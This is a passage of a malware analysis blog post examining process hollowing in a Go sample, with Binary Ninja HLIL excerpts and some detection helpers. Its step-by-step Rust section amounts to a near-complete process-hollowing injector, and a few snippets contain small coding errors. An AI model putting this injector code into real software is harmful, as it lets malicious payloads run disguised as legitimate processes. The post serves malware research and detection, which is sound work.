A malware analysis journey: Discovering process hollowing

Introduction

Recently, I downloaded a malware sample from Malware Bazaar for analysis. As I began reverse engineering it in Binary Ninja, I found something interesting: the malware implements process hollowing. Process hollowing (also known as RunPE or Process Replacement) is a long-established code injection technique that lets an attacker execute malicious code within the context of a legitimate process, which makes detection more challenging.

What caught my attention was not just that the malware uses process hollowing, but how it implements it. The implementation includes sophisticated PE relocation handling, support for both 32-bit and 64-bit payloads, careful PEB (Process Environment Block) manipulation, and thread context manipulation with architecture-specific handling. These details reveal a well-engineered piece of malware that demonstrates deep understanding of Windows internals.

In this blog post, I’ll share my analysis findings, including the theoretical foundation of process hollowing, how it works at the Windows API level, real-world implementation analysis from the malware sample I analyzed in Binary Ninja, HLIL (High-Level Intermediate Language) code extracted directly from Binary Ninja, how to implement similar techniques in Rust for educational purposes, and detection and mitigation strategies.

⚠️ Disclaimer: This content is for educational and security research purposes only. The malware sample was obtained from Malware Bazaar for legitimate security research. Understanding these techniques is crucial for malware analysts, security researchers, and defenders.


Understanding Process Hollowing

What is Process Hollowing?

Process hollowing is a code injection technique where a legitimate process is first created in a suspended state. The original executable’s image is then unmapped from memory or overwritten, and malicious code is written into the process’s memory space. The process’s execution context is modified to point to the malicious code, and finally the process is resumed, executing the malicious payload. The result is a malicious program running under the name of a legitimate process such as notepad.exe or cmd.exe.

The technique gets its name from the fact that the process is “hollowed out”: its original content is removed, leaving an empty shell that is then filled with malicious code. Think of it like a chocolate bunny: the shell looks like chocolate, but it’s empty inside, and you can fill it with anything.

The attack flow begins with creating a process using CreateProcess with the CREATE_SUSPENDED flag, which creates the process but pauses its main thread before any of its code runs. Some implementations then call NtUnmapViewOfSection to remove the original image from memory, though many modern implementations skip this step and directly overwrite the memory. Next, VirtualAllocEx is used to allocate memory for the payload, followed by WriteProcessMemory to write the malicious code into the allocated space. The PE headers are then updated so that the ImageBase field matches the new location. The thread context is modified using GetThreadContext and SetThreadContext to redirect execution to the payload’s entry point, and the PEB (Process Environment Block) is updated to modify the ImageBaseAddress. Finally, ResumeThread is called to execute the malicious code.


The Technical Foundation

Key Windows APIs

Process hollowing relies on several critical Windows APIs that work together to achieve code injection. The CreateProcess API is used to create a process in a suspended state, giving the attacker control before the original code executes. VirtualAllocEx allocates memory in the remote process, providing space for the malicious payload. WriteProcessMemory writes data to the remote process memory, allowing the attacker to inject the malicious code. GetThreadContext retrieves the thread execution state, which is necessary to understand and modify where execution will begin. SetThreadContext modifies the thread execution state, redirecting execution to the malicious code. The optional NtUnmapViewOfSection can be used to remove mapped sections, though many implementations skip this step. Finally, ResumeThread resumes the suspended thread, causing the malicious code to execute.
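From a defender’s point of view, the API list above is also a behavioral signature. The following is a minimal sketch, assuming you already have an ordered list of API names for one process (for example from a sandbox report). The names HOLLOWING_SEQUENCE and contains_in_order are hypothetical, and the check is a simple heuristic rather than a complete detection rule.

```rust
/// API names in the order the text describes them (optional steps omitted).
/// Assumption: the trace records the wide-character variant, CreateProcessW.
const HOLLOWING_SEQUENCE: [&str; 6] = [
    "CreateProcessW",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "GetThreadContext",
    "SetThreadContext",
    "ResumeThread",
];

/// Returns true when every name in `pattern` appears in `trace` in the same
/// relative order. Unrelated calls may be interleaved between them.
fn contains_in_order(trace: &[&str], pattern: &[&str]) -> bool {
    let mut remaining = pattern.iter();
    let mut next = remaining.next();
    for call in trace {
        match next {
            // The call we are waiting for: advance to the next pattern item.
            Some(expected) if call == expected => next = remaining.next(),
            // Some other call: ignore it.
            Some(_) => {}
            // Whole pattern already matched.
            None => break,
        }
    }
    next.is_none()
}
```

A trace that contains the same calls in a different order does not match, which keeps ordinary process creation from being flagged by this check alone.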

PE (Portable Executable) Format

Understanding the PE format is crucial for implementing process hollowing. The PE format begins with a DOS header that provides legacy compatibility. The NT headers contain both the file header and the optional header, which includes critical information such as the ImageBase and AddressOfEntryPoint. The PE file is organized into sections such as .text for code, .data for initialized data, and .rdata for read-only data. When the ImageBase changes, relocations must be applied to adjust addresses throughout the executable. This relocation handling is one of the more complex aspects of process hollowing, as the payload may need to be relocated to a different base address than it was compiled for.
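To make the header layout concrete, here is a small sketch that reads the fields mentioned above from a byte buffer using only the standard library. The type PeSummary and the function names are illustrative, not part of any crate, and the code reads headers only (no sections or relocations).

```rust
/// Header fields relevant to this article.
#[derive(Debug, PartialEq)]
struct PeSummary {
    is_64bit: bool,
    image_base: u64,
    entry_point_rva: u32,
}

/// Bounds-checked slice of `len` bytes at `off`.
fn read_bytes(buf: &[u8], off: usize, len: usize) -> Option<&[u8]> {
    buf.get(off..off.checked_add(len)?)
}

fn read_u16(buf: &[u8], off: usize) -> Option<u16> {
    let b = read_bytes(buf, off, 2)?;
    Some(u16::from_le_bytes([b[0], b[1]]))
}

fn read_u32(buf: &[u8], off: usize) -> Option<u32> {
    let b = read_bytes(buf, off, 4)?;
    Some(u32::from_le_bytes([b[0], b[1], b[2], b[3]]))
}

fn read_u64(buf: &[u8], off: usize) -> Option<u64> {
    let b = read_bytes(buf, off, 8)?;
    let mut a = [0u8; 8];
    a.copy_from_slice(b);
    Some(u64::from_le_bytes(a))
}

/// Parses the DOS header, NT signature, and optional header of a PE image.
fn summarize_pe(buf: &[u8]) -> Option<PeSummary> {
    if read_u16(buf, 0)? != 0x5A4D {
        return None; // missing "MZ"
    }
    let nt = read_u32(buf, 0x3C)? as usize; // e_lfanew
    if read_u32(buf, nt)? != 0x0000_4550 {
        return None; // missing "PE\0\0"
    }
    // Optional header follows the 4-byte signature and 20-byte file header.
    let opt = nt.checked_add(4 + 20)?;
    let entry_point_rva = read_u32(buf, opt.checked_add(0x10)?)?;
    match read_u16(buf, opt)? {
        // PE32: ImageBase is a 32-bit field at optional header offset 0x1C.
        0x10B => Some(PeSummary {
            is_64bit: false,
            image_base: read_u32(buf, opt.checked_add(0x1C)?)? as u64,
            entry_point_rva,
        }),
        // PE32+: ImageBase is a 64-bit field at optional header offset 0x18.
        0x20B => Some(PeSummary {
            is_64bit: true,
            image_base: read_u64(buf, opt.checked_add(0x18)?)?,
            entry_point_rva,
        }),
        _ => None,
    }
}
```

Reading fields by offset rather than casting to a struct avoids alignment and bounds problems when the input is untrusted, which is the normal situation in malware analysis.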

Process Environment Block (PEB)

The PEB is a critical Windows structure that holds per-process information in user-mode memory. It includes ImageBaseAddress, which stores the base address of the main executable image, along with the loaded module list and a pointer to the process parameters (including the command line). The PEB must be updated to match the new code location: the loader in ntdll and APIs such as GetModuleHandle(NULL) read ImageBaseAddress to find the main image, so a stale value typically makes the process fail during startup or when it tries to access its own code or data.


Step-by-Step Implementation

Step 1: Create Suspended Process

The first step in process hollowing is to create a legitimate process in a suspended state. The implementation uses CreateProcessW with the CREATE_SUSPENDED flag, which tells Windows to create the process but pause its main thread before execution begins. At that point Windows has mapped the target executable into memory and created the process structures, but none of the original code has run yet. This gives us full control over the process before it starts running.

use winapi::um::processthreadsapi::*;
use winapi::um::winbase::*;
use winapi::um::winnt::*;

fn create_suspended_process(target_path: &str) -> Result<(HANDLE, HANDLE), String> {
    let mut si: STARTUPINFOW = unsafe { std::mem::zeroed() };
    let mut pi: PROCESS_INFORMATION = unsafe { std::mem::zeroed() };

    si.cb = std::mem::size_of::<STARTUPINFOW>() as u32;

    let target_path_wide: Vec<u16> = target_path.encode_utf16().chain(Some(0)).collect();

    let success = unsafe {
        CreateProcessW(
            std::ptr::null(),
            target_path_wide.as_ptr() as *mut u16,
            std::ptr::null_mut(),
            std::ptr::null_mut(),
            FALSE,
            CREATE_SUSPENDED,  // ← KEY: Process suspended
            std::ptr::null_mut(),
            std::ptr::null(),
            &mut si,
            &mut pi,
        )
    };

    if success == 0 {
        return Err(format!("CreateProcess failed: {}", unsafe { 
            winapi::um::errhandlingapi::GetLastError() 
        }));
    }

    Ok((pi.hProcess, pi.hThread))
}

The function returns both the process handle and thread handle, which are needed for subsequent operations. The process handle is used for memory operations, while the thread handle is used for context manipulation.

Step 2: Unmap Original Image (Optional)

Some implementations unmap the original image, while others just overwrite it. The unmapping approach uses NtUnmapViewOfSection to remove the original executable’s code from memory, freeing up the memory space. However, many modern implementations skip this step and directly overwrite the memory, as it’s simpler and achieves the same result. The unmapping approach requires getting the function pointer from ntdll.dll, which adds complexity to the implementation.

use winapi::um::winnt::*;
use winapi::um::memoryapi::*;

fn unmap_original_image(process_handle: HANDLE, image_base: *mut c_void) -> Result<(), String> {
    // Get NtUnmapViewOfSection from ntdll.dll
    let ntdll = unsafe { 
        winapi::um::libloaderapi::GetModuleHandleA(
            b"ntdll.dll\0".as_ptr() as *const i8
        )
    };

    if ntdll.is_null() {
        return Err("Failed to get ntdll.dll handle".to_string());
    }

    type NtUnmapViewOfSection = unsafe extern "system" fn(
        ProcessHandle: HANDLE,
        BaseAddress: *mut c_void,
    ) -> u32;

    let nt_unmap = unsafe {
        winapi::um::libloaderapi::GetProcAddress(
            ntdll,
            b"NtUnmapViewOfSection\0".as_ptr() as *const i8
        )
    };

    if nt_unmap.is_null() {
        return Err("Failed to get NtUnmapViewOfSection".to_string());
    }

    let unmap_fn: NtUnmapViewOfSection = unsafe { std::mem::transmute(nt_unmap) };

    let status = unsafe { unmap_fn(process_handle, image_base) };

    if status != 0 {
        return Err(format!("NtUnmapViewOfSection failed: 0x{:x}", status));
    }

    Ok(())
}

Step 3: Allocate Memory for Payload

We need to allocate executable memory in the target process where the payload will be written. The VirtualAllocEx function is used for this purpose, with PAGE_EXECUTE_READWRITE protection flags to allow execution, reading, and writing. The MEM_COMMIT | MEM_RESERVE flags commit and reserve the memory. We can optionally specify a preferred base address from the PE optional header, though if that address is not available, we can allocate at any available address.

use winapi::um::winnt::*;
use winapi::um::memoryapi::*;

fn allocate_payload_memory(
    process_handle: HANDLE,
    size: usize,
    preferred_base: Option<*mut c_void>,
) -> Result<*mut c_void, String> {
    let base_address = preferred_base.unwrap_or(std::ptr::null_mut());

    let allocated = unsafe {
        VirtualAllocEx(
            process_handle,
            base_address,
            size,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE,  // ← Executable memory
        )
    };

    if allocated.is_null() {
        return Err(format!("VirtualAllocEx failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    Ok(allocated)
}

If the preferred base address is unavailable and the payload ends up somewhere else, its relocations must be applied against the address that was actually returned. Note also that a PAGE_EXECUTE_READWRITE region allocated in another process is one of the more recognizable artifacts of this technique.

Step 4: Write Payload to Process

Now we write the malicious payload into the allocated memory using WriteProcessMemory. This function copies the payload data from our process into the target process’s memory space. It’s important to verify that all bytes were written successfully, as partial writes can lead to corruption and crashes.

use winapi::um::memoryapi::*;
use winapi::um::winnt::*;

fn write_payload(
    process_handle: HANDLE,
    base_address: *mut c_void,
    payload: &[u8],
) -> Result<(), String> {
    let mut bytes_written: usize = 0;

    let success = unsafe {
        WriteProcessMemory(
            process_handle,
            base_address,
            payload.as_ptr() as *const c_void,
            payload.len(),
            &mut bytes_written,
        )
    };

    if success == 0 {
        return Err(format!("WriteProcessMemory failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    if bytes_written != payload.len() {
        return Err(format!(
            "Partial write: {}/{} bytes",
            bytes_written,
            payload.len()
        ));
    }

    Ok(())
}

This step is critical because it’s where the actual malicious code is injected into the target process. The payload must be written correctly, and if relocations are needed, they should be applied before or during this step.

Step 5: Update PE Headers

We need to modify the PE headers to reflect the new memory location. This involves parsing the PE structure from the payload, finding the optional header, and updating the ImageBase field to match the new memory location. We also need to extract the entry point RVA (Relative Virtual Address) so we know where execution should begin.

use winapi::um::winnt::*;

fn update_pe_headers(
    process_handle: HANDLE,
    base_address: *mut c_void,
    payload: &[u8],
    new_image_base: u64,
) -> Result<u32, String> {
    // Parse PE headers from payload
    let dos_header = unsafe { &*(payload.as_ptr() as *const IMAGE_DOS_HEADER) };

    if dos_header.e_magic != IMAGE_DOS_SIGNATURE {
        return Err("Invalid DOS signature".to_string());
    }

    let nt_headers_offset = dos_header.e_lfanew as usize;
    let nt_headers = unsafe {
        &mut *((payload.as_ptr() as usize + nt_headers_offset) as *mut IMAGE_NT_HEADERS64)
    };

    if nt_headers.Signature != IMAGE_NT_SIGNATURE {
        return Err("Invalid NT signature".to_string());
    }

    let entry_point_rva = nt_headers.OptionalHeader.AddressOfEntryPoint;

    // Update ImageBase in memory
    let optional_header_addr = unsafe {
        (base_address as usize + nt_headers_offset + 
         std::mem::size_of::<IMAGE_NT_SIGNATURE>() +
         std::mem::size_of::<IMAGE_FILE_HEADER>()) as *mut IMAGE_OPTIONAL_HEADER64
    };

    let mut bytes_written: usize = 0;
    unsafe {
        WriteProcessMemory(
            process_handle,
            optional_header_addr as *mut c_void,
            &new_image_base as *const u64 as *const c_void,
            std::mem::size_of::<u64>(),
            &mut bytes_written,
        );
    }

    Ok(entry_point_rva)
}

The PE headers must be updated in the target process’s memory, not just in our local copy. This ensures that when the process executes, it knows where its code is located.

Step 6: Modify Thread Context

This is the critical step where we change where execution will start. We use GetThreadContext to retrieve the current thread’s execution state, modify the instruction pointer (RIP for 64-bit, EIP for 32-bit) to point to the payload’s entry point, and then use SetThreadContext to apply the changes. When the thread resumes, it will start executing from the new instruction pointer.

use winapi::um::winnt::*;
use winapi::um::processthreadsapi::*;

fn update_thread_context(
    thread_handle: HANDLE,
    entry_point: u64,
    is_64bit: bool,
) -> Result<(), String> {
    let mut context: CONTEXT = unsafe { std::mem::zeroed() };

    if is_64bit {
        context.ContextFlags = CONTEXT_FULL;
    } else {
        context.ContextFlags = CONTEXT_FULL | CONTEXT_WOW64;
    }

    // Get current thread context
    let success = unsafe {
        GetThreadContext(thread_handle, &mut context)
    };

    if success == 0 {
        return Err(format!("GetThreadContext failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    // Update instruction pointer
    if is_64bit {
        context.Rip = entry_point;  // 64-bit: RIP
    } else {
        context.Eip = entry_point as u32;  // 32-bit: EIP
    }

    // Set modified context
    let success = unsafe {
        SetThreadContext(thread_handle, &context)
    };

    if success == 0 {
        return Err(format!("SetThreadContext failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    Ok(())
}

The instruction pointer (RIP/EIP) must point to the entry point of the payload. This is calculated as the base address plus the entry point RVA from the PE headers.

Step 7: Update PEB

The Process Environment Block must be updated to match the new code location. The PEB address is retrieved from the initial thread context of the suspended process (stored in the RDX register for 64-bit processes, or EBX for 32-bit processes; RCX and EAX hold the entry point). We then calculate the offset to the ImageBaseAddress field (0x10 for 64-bit, 0x8 for 32-bit) and write the new image base address to that location.

use winapi::um::winnt::*;

#[repr(C)]
struct PEB64 {
    // ... fields ...
    image_base_address: *mut c_void,  // Offset 0x10 in 64-bit PEB
    // ... more fields ...
}

fn update_peb(
    process_handle: HANDLE,
    thread_handle: HANDLE,
    new_image_base: u64,
    is_64bit: bool,
) -> Result<(), String> {
    // Get PEB address from thread context
    let mut context: CONTEXT = unsafe { std::mem::zeroed() };

    if is_64bit {
        context.ContextFlags = CONTEXT_FULL;
    } else {
        context.ContextFlags = CONTEXT_FULL | CONTEXT_WOW64;
    }

    unsafe {
        GetThreadContext(thread_handle, &mut context);
    }

    // PEB address is in RDX (64-bit) or EBX (32-bit) register
    let peb_address = if is_64bit {
        context.Rdx as *mut PEB64
    } else {
        context.Ebx as *mut PEB32
    };

    // Update ImageBaseAddress in PEB
    let image_base_offset = if is_64bit { 0x10 } else { 0x8 };
    let peb_image_base = unsafe {
        (peb_address as usize + image_base_offset) as *mut u64
    };

    let mut bytes_written: usize = 0;
    unsafe {
        WriteProcessMemory(
            process_handle,
            peb_image_base as *mut c_void,
            &new_image_base as *const u64 as *const c_void,
            if is_64bit { 8 } else { 4 },
            &mut bytes_written,
        );
    }

    Ok(())
}

The PEB update is crucial because Windows reads ImageBaseAddress whenever it needs to locate the main image, for example during loader initialization. If the field doesn’t match the actual code location, the process is likely to crash when it tries to find its own headers, imports, or resources.

Step 8: Resume Thread

Finally, we resume the thread to execute the payload. The ResumeThread function un-suspends the thread, and execution begins from the instruction pointer we set in the thread context. At this point, the malicious payload begins executing in the context of the legitimate process.

use winapi::um::processthreadsapi::*;

fn resume_thread(thread_handle: HANDLE) -> Result<(), String> {
    let result = unsafe { ResumeThread(thread_handle) };

    if result == u32::MAX {
        return Err(format!("ResumeThread failed: {}", unsafe {
            winapi::um::errhandlingapi::GetLastError()
        }));
    }

    Ok(())
}

This is the final step that brings everything together. Once the thread resumes, the malicious code executes, but tools that only look at the process name and the image path on disk still see the legitimate program that was originally created.


Real-World Analysis: Malware Sample

Now let’s dive into the actual malware sample I analyzed. This is a Go-based malware sample that I downloaded from Malware Bazaar and analyzed using Binary Ninja. The sample information shows it’s a Go compiled binary targeting x64 Windows architecture. The malware implements a complete process hollowing mechanism with several interesting features that demonstrate sophisticated understanding of Windows internals.

📝 Note: All HLIL (High-Level Intermediate Language) code snippets shown below are extracted directly from Binary Ninja’s analysis of this malware sample. The addresses and function names are as identified by Binary Ninja during my reverse engineering session.

Function: mw_RunPE (Main Process Hollowing Function)

Address: 0x140078aa0

This is the core function that orchestrates the entire process hollowing operation. The following HLIL code was extracted from Binary Ninja’s analysis:

HLIL Code from Binary Ninja:

140078ad9        char rax_1
140078ad9        int64_t rcx_1
140078ad9        int128_t zmm15
140078ad9        rax_1, rcx_1, zmm15 = main.RelocateModule(arg2, arg3, arg1, 0, arg6)
140078ae2        if (rax_1 == 0)
140078bc8        return 0

The function first calls RelocateModule to handle PE relocations. This is crucial because the payload might need to be relocated to a different base address than it was compiled for. If the relocation fails, the function returns early, indicating that the process hollowing cannot proceed.
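The internals of RelocateModule are not shown here, so the following is only a sketch of the data such a routine has to walk, based on the documented layout of the PE base relocation table: each block starts with a page RVA and a block size, followed by 16-bit entries whose top 4 bits are the type and low 12 bits the offset within the page. The names RelocEntry, decode_reloc_block, and reloc_delta are hypothetical.

```rust
/// One decoded entry from a base relocation block.
#[derive(Debug, PartialEq)]
struct RelocEntry {
    kind: u8, // e.g. 3 = IMAGE_REL_BASED_HIGHLOW, 10 = IMAGE_REL_BASED_DIR64
    rva: u32, // RVA of the address that needs fixing
}

const IMAGE_REL_BASED_ABSOLUTE: u8 = 0; // padding entry, carries no fixup

/// Decodes a single IMAGE_BASE_RELOCATION block: an 8-byte header
/// (VirtualAddress, SizeOfBlock) followed by 16-bit entries.
fn decode_reloc_block(block: &[u8]) -> Option<Vec<RelocEntry>> {
    if block.len() < 8 {
        return None;
    }
    let page_rva = u32::from_le_bytes([block[0], block[1], block[2], block[3]]);
    let size = u32::from_le_bytes([block[4], block[5], block[6], block[7]]) as usize;
    if size < 8 || size > block.len() {
        return None;
    }
    let mut out = Vec::new();
    for pair in block[8..size].chunks_exact(2) {
        let raw = u16::from_le_bytes([pair[0], pair[1]]);
        let kind = (raw >> 12) as u8;
        if kind == IMAGE_REL_BASED_ABSOLUTE {
            continue;
        }
        let rva = page_rva.checked_add((raw & 0x0FFF) as u32)?;
        out.push(RelocEntry { kind, rva });
    }
    Some(out)
}

/// Value added to every relocated address when the image is loaded at
/// `actual_base` instead of the `preferred_base` from its headers.
fn reloc_delta(actual_base: u64, preferred_base: u64) -> u64 {
    actual_base.wrapping_sub(preferred_base)
}
```

Listing the entries this way is useful when comparing a dumped payload against its on-disk form, since the relocated addresses are exactly the bytes that are expected to differ.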

140078af2        char rax_3
140078af2        int64_t rcx_3
140078af2        rax_3, rcx_3 = main.Is64Bit(main._RunPE.func1(rcx_1, arg6, zmm15), arg6)
140078b02        int32_t* rax_5
140078b02        int128_t zmm15_1
140078b02        rax_5, zmm15_1 = main.GetNTHdrs(rcx_3, arg3, 0, arg6)

The code then checks if the payload is 64-bit or 32-bit using Is64Bit, and gets the NT headers from the payload PE using GetNTHdrs. This determines which architecture-specific code paths to use, as 32-bit and 64-bit processes require different handling for thread contexts and PEB manipulation.

140078b17        int64_t rcx_5
140078b17        if (rax_3 == 0)
140078b24        rcx_5 = arg2
140078b29        rax_5[0xd] = rcx_5.d
140078b19        rcx_5 = arg2
140078b1e        *(rax_5 + 0x30) = rcx_5

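The code updates the ImageBase field in the payload’s headers to the address where the payload will be loaded. rax_5 points to the start of the NT headers, so both offsets are relative to that point rather than to the optional header: for 32-bit payloads the field is at 0x34 (written as rax_5[0xd], because rax_5 is an int32_t*), and for 64-bit payloads it is at 0x30. Subtracting the 0x18 bytes taken by the signature and file header gives the optional header offsets 0x1c (PE32) and 0x18 (PE32+). This ensures the PE structure knows where it’s loaded in memory.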
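The offsets in this listing can be checked with a few lines of arithmetic. This is a small sketch with hypothetical names; the constants come from the documented PE header sizes.

```rust
const NT_SIGNATURE_SIZE: usize = 4; // "PE\0\0"
const FILE_HEADER_SIZE: usize = 20; // IMAGE_FILE_HEADER

/// Byte offset of ImageBase measured from the start of the NT headers.
fn image_base_offset_from_nt_headers(is_64bit: bool) -> usize {
    // Offset of ImageBase inside the optional header itself.
    let in_optional_header = if is_64bit { 0x18 } else { 0x1C };
    NT_SIGNATURE_SIZE + FILE_HEADER_SIZE + in_optional_header
}

/// Converts an HLIL array index into a byte offset for a given element size.
fn index_to_byte_offset(index: usize, element_size: usize) -> usize {
    index * element_size
}
```

With a 4-byte element size, index 0xd gives 0x34, which matches the 32-bit result of image_base_offset_from_nt_headers.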

140078b48        mw_WriteProcessMemory(arg3, *arg5, arg2, arg1, arg6)

The entire payload is written to the target process memory using mw_WriteProcessMemory. The parameters include the process handle, the base address in the target process, the payload buffer, and the size of the payload. This is where the actual malicious code is injected into the target process.

140078b61        char rax_9
140078b61        int64_t rcx_8
140078b61        int128_t zmm15_2
140078b61        rax_9, rcx_8, zmm15_2 = mw_RedirectToPayload(arg5, arg4, arg6)
140078b68        if (rax_9 == 0)
140078bb7        return 0

The function calls mw_RedirectToPayload to update the thread context (instruction pointer) and update the PEB (ImageBaseAddress). This prepares the process to execute the payload. If this step fails, the function returns, indicating that the redirection could not be completed.

140078ba0        syscall.(*LazyProc).Call(1, rdx_1, main.SResume_Thread, rax_10, 1, arg6, zmm1_1)

Finally, the suspended thread is resumed by calling ResumeThread through Go’s LazyProc wrapper. At this point, the malicious payload begins executing: the thread picks up the entry point that was placed in its context, which now belongs to the injected payload.

Function: mw_RedirectToPayload (Thread Context & PEB Update)

Address: 0x140078980

This function handles the critical redirection of execution. Here’s the HLIL code from Binary Ninja:

HLIL Code from Binary Ninja:

1400789a1        int32_t rax_1
1400789a1        int128_t zmm15
1400789a1        rax_1, zmm15 = main.GetEntryPointRVA(arg1, rax, arg3)
1400789a8        int64_t rcx_1 = zx.q(rax_1) + arg_10

The function first gets the entry point RVA (Relative Virtual Address) from the PE headers using GetEntryPointRVA. It then calculates the absolute entry point address by adding the base address to the entry point RVA. This gives us the exact memory address where execution should begin.

1400789c6        rax_3, rcx_3, zmm0_1, zmm1_1 = main.UpdateRemoteEntryPoint(zx.q(arg2), zmm1, arg1, rcx_1, arg3, zmm0)

The function then calls UpdateRemoteEntryPoint to update the thread context to point to the payload’s entry point. This is where execution will start when the thread resumes. The thread context modification is architecture-specific, handling both 32-bit and 64-bit processes differently.

1400789e0        uint64_t rax_5
1400789e0        int64_t rcx_4
1400789e0        int128_t zmm15_1
1400789e0        rax_5, rcx_4, zmm15_1 = main.GetRemotePebAddr(rcx_3, zmm1_1, arg1, arg2, arg3, zmm0_1)

The function gets the address of the PEB in the target process using GetRemotePebAddr. In the initial thread context of a newly created process, the PEB address is found in the RDX register for 64-bit processes or the EBX register for 32-bit processes, so it can be read straight from the thread context.

140078a03        int64_t rbx_3 = rax_5 + main.GetImgBasePebOffset(main.RedirectToPayload.func2(rcx_4, arg3, zmm15_1), arg2, arg3)
140078a1f        int64_t rdi = 8
140078a29        if (zx.q(arg2) != 0)
140078a29        rdi = 4
140078a3b        if (mw_WriteProcessMemory(&arg_10, *arg1, rbx_3, rdi, arg3) == 0)

The code calculates the address of the ImageBaseAddress field in the PEB. The offset is 0x10 for 64-bit processes (8 bytes) or 0x8 for 32-bit processes (4 bytes). It then writes the new image base address to the PEB using WriteProcessMemory. This update is critical because Windows uses the PEB to resolve addresses, and if it doesn’t match the actual code location, the process will crash.
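The address and width selection in this listing boils down to the following arithmetic. This is an illustrative sketch with a hypothetical function name; it computes values only and does not touch any process.

```rust
/// Returns the address of PEB.ImageBaseAddress and the width of the field
/// in bytes, given the PEB address and the bitness of the target.
fn peb_image_base_field(peb: u64, is_32bit: bool) -> Option<(u64, usize)> {
    // 32-bit PEB: 4-byte pointer at 0x8. 64-bit PEB: 8-byte pointer at 0x10.
    let (offset, width) = if is_32bit { (0x8, 4) } else { (0x10, 8) };
    Some((peb.checked_add(offset)?, width))
}
```

This mirrors the rdi = 8 default and the rdi = 4 override seen in the HLIL, where a non-zero arg2 selects the 32-bit case.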

Function: main.UpdateRemoteEntryPoint (Thread Context Manipulation)

Address: 0x140078704

This function modifies the thread context to redirect execution. Binary Ninja’s HLIL analysis shows:

HLIL Code from Binary Ninja:

140078722        if (arg1.b != 0)
14007872b        int128_t* rax = runtime.newobject(arg1, arg2, &data_14014b540, arg5, arg6)
140078740        zmm0, zmm1 = main.Memset(0x2cc, rax, 0, arg5)
14007874a        *rax = 0x100002

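The function first checks whether it is dealing with a 32-bit process. If so, it allocates a WOW64_CONTEXT structure (0x2cc bytes) and sets ContextFlags, the first field, to 0x100002. That value is not CONTEXT_FULL: it decodes to CONTEXT_AMD64 | CONTEXT_INTEGER, a request for the integer registers only, whereas CONTEXT_FULL is 0x10000B on x64 (the documented WOW64 counterpart of the integer flag is WOW64_CONTEXT_INTEGER, 0x10002). This structure is used to manipulate 32-bit processes running under WOW64 on a 64-bit system.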

140078759        rax_2, zmm0_1, zmm1_1 = main.Wow64_Get_ThreadContext(arg3, zmm1, *(arg3 + 8), rax, arg5, zmm0)
14007876e        rax[0xb].d = arg4.d
14007878a        return main.Wow64Set_ThreadContext(arg3, zmm1_1, *(arg3 + 8), rax, arg5, zmm0_1)

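For 32-bit processes, the function gets the WOW64 thread context and overwrites one 32-bit field before setting the context back. Because Binary Ninja typed rax as int128_t*, the index 0xb is in 16-byte units, so the write lands at byte offset 0xb0, which is Eax in WOW64_CONTEXT rather than Eip (0xb8). In a newly created suspended process, Eax holds the entry point that the thread start thunk in ntdll will call, so replacing it redirects execution to the payload’s entry point without touching the instruction pointer itself.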

14007879a        int128_t* rax_6 = runtime.newobject(arg1, arg2, &data_14014c9e0, arg5, arg6)
1400787ab        zmm0_2, zmm1_2 = main.Memset(0x4d0, rax_6, 0, arg5)
1400787b5        rax_6[3].d = 0x100002

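For 64-bit processes, the function allocates a CONTEXT structure (0x4d0 bytes) and writes 0x100002 to ContextFlags at byte offset 0x30 (index 3 of 16-byte elements). As above, this value is CONTEXT_AMD64 | CONTEXT_INTEGER rather than CONTEXT_FULL. This larger structure is needed to represent the full 64-bit register set.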
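When a raw ContextFlags constant shows up in a listing like this, it helps to decode it rather than guess. The sketch below uses the architecture and register-class bits defined in winnt.h; the function name decode_context_flags is hypothetical, and only the five classes shared by x86 and x64 are covered.

```rust
/// Splits a ContextFlags value into its architecture tag and the register
/// classes it requests.
fn decode_context_flags(flags: u32) -> (&'static str, Vec<&'static str>) {
    let arch = if (flags & 0x0010_0000) != 0 {
        "AMD64" // CONTEXT_AMD64
    } else if (flags & 0x0001_0000) != 0 {
        "i386" // CONTEXT_i386 / WOW64_CONTEXT_i386
    } else {
        "unknown"
    };
    let classes: [(u32, &'static str); 5] = [
        (0x01, "CONTROL"),
        (0x02, "INTEGER"),
        (0x04, "SEGMENTS"),
        (0x08, "FLOATING_POINT"),
        (0x10, "DEBUG_REGISTERS"),
    ];
    let parts: Vec<&'static str> = classes
        .iter()
        .filter(|&&(bit, _)| (flags & bit) != 0)
        .map(|&(_, name)| name)
        .collect();
    (arch, parts)
}
```

For example, 0x100002 decodes to AMD64 with only INTEGER set, while the x64 CONTEXT_FULL value 0x10000B decodes to CONTROL, INTEGER, and FLOATING_POINT.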

1400787c5        rax_8, zmm15 = main.Get_ThreadContext(arg3, zmm1_2, *(arg3 + 8), rax_6, arg5, zmm0_2)
1400787cf        rcx_4, zmm0_3, zmm1_3 = main.UpdateRemoteEntryPoint.func1(2, arg5, zmm15)
1400787de        rax_6[8].q = arg4

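The function gets the current thread context and stores the new entry point address in it. Since rax_6 is typed as int128_t*, index 8 corresponds to byte offset 0x80, which is Rcx in the x64 CONTEXT structure (Rip is at 0xf8). In a newly created suspended process, Rcx holds the entry point that the thread start thunk in ntdll will call, so this is the 64-bit equivalent of the Eax update in the 32-bit path.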

1400787f6        if (main.Set_ThreadContext(rcx_4, zmm1_3, *(arg3 + 8), rax_6, arg5, zmm0_3) == 0)

Finally, the modified context is applied to the thread using Set_ThreadContext. When the thread resumes, execution is redirected to the payload’s entry point.

Function: main.GetRemotePebAddr (PEB Address Retrieval)

Address: 0x140078844

This function retrieves the PEB address from the thread context. The HLIL code from Binary Ninja reveals:

HLIL Code from Binary Ninja:

140078859        if (arg4 != 0)
140078862        int64_t* rax = runtime.newobject(arg1, arg2, &data_14014b540, arg5, arg6)
14007887d        *rax = 0x100002
140078893        if (main.Wow64_Get_ThreadContext(arg3, zmm1, *(arg3 + 8), rax, arg5, zmm0) == 0)
1400788a5        return zx.q(*(rax + 0xa4))

For 32-bit processes, the function gets the WOW64 thread context and retrieves the PEB address from offset 0xa4 in the WOW64_CONTEXT structure, which is the Ebx register. In the initial context of a newly created 32-bit process, Ebx holds the PEB address.

1400788ae        rcx_2, zmm0_1, zmm1_1 = main.GetRemotePebAddr.func1(arg1, arg5, zmm15)
